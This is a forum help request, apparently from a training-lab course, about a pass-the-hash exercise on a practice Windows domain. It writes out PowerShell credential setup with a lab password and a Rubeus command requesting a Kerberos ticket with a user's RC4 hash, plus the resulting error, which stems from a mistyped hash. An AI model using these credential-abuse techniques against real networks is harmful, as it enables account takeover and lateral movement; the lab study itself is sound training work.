Hi @linuxoid92120 , I have a question .
i’m stuck at the 2nd question “Connect to the target machine using Helen’s Credentials, from there, use Leonvqz hash A35289033D176ABAAF6BEAA0AA681400 to connect to SRV02 and read the flag located at”.
my step by step:
- PS C:\Tools> $username = “INLANEFREIGHT\Helen”
- PS C:\Tools> $password = “RedRiot88”
- PS C:\Tools> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
- PS C:\Tools> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
- PS C:\Tools> Enter-PSSession $sessionSRV02
- .\Rubeus.exe asktgt /user:leonvqz /rc4:3223DS033D176ABAAF6BEAA0AA681400 /nowrap
after that .\Rubeus.exe show me the following error:
[*] Action: Ask TGT
[] Got domain: inlanefreight.local
[] Using rc4_hmac hash: 3223DS033D176ABAAF6BEAA0AA681400
[*] Building AS-REQ (w/ preauth) for: ‘inlanefreight.local\leonvqz’
[!] Unhandled Rubeus exception:
System.FormatException: Additional non-parsable characters are at the end of the string.
at System.ParseNumbers.StringToInt(String s, Int32 radix, Int32 flags, Int32* currPos)
at System.Convert.ToByte(String value, Int32 fromBase)
at System.Linq.Enumerable.WhereSelectEnumerableIterator2.MoveNext() at System.Linq.Buffer
1…ctor(IEnumerable1 source) at System.Linq.Enumerable.ToArray[TSource](IEnumerable
1 source)
at Rubeus.PA_DATA…ctor(String keyString, KERB_ETYPE etype)
at Rubeus.AS_REQ…ctor(String keyString, KERB_ETYPE etype, Boolean opsec, Boolean pac)
at Rubeus.AS_REQ.NewASReq(String userName, String domain, String keyString, KERB_ETYPE etype, Boolean opsec, Boolean changepw, Boolean pac, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean opsec, String servicekey, Boolean changepw, Boolean pac, String proxyUrl, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Commands.Asktgt.Execute(Dictionary2 arguments) at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary
2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
can you help me?